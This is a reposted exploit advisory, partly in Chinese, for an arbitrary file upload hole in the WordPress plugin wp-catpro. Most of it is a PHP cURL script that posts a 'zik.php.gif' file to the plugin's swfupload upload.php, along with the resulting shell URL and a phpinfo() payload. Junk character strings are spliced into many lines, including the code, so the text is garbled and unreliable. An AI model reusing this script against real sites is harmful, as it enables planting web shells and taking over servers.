WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

2 S' m8 b8 B$ X' g8 a" s! \) `作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
+ @6 I. W' T. m0 r. @$ J# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
& b# j* `, |, U$ k6 F2 M* E# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
; R8 M9 p" Z/ z& y
#=> Exploit
6 R/ M! ]2 d" E# N-----------
<?php

' r3 @# d- B( ^& R+ |  m" r7 u$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
$ [' M: m$ A9 q2 acurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
, {4 u& W; N9 r) c/ w5 F' f'folder'=>'/wp-content/uploads/catpro/'));
  x7 T/ X6 x5 ?# k7 Y- h, ?5 jcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
0 G" g% S% U2 j( W4 p$postResult = curl_exec($ch);
curl_close($ch);
: e8 @  P$ s0 Q/ g" q
6 A( H# I8 q4 R6 v9 |, J7 x  ^& xprint "$postResult";

3 @# C& F6 J6 YShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
. ?" q9 V6 }  Y  w  ?>
% j) B* \. r* G  y2 \- u<?php
' F9 A3 \/ j7 O7 ^2 Z0 dphpinfo();
1 m5 W  k4 q7 K( g7 |& J% R4 O: L5 G?>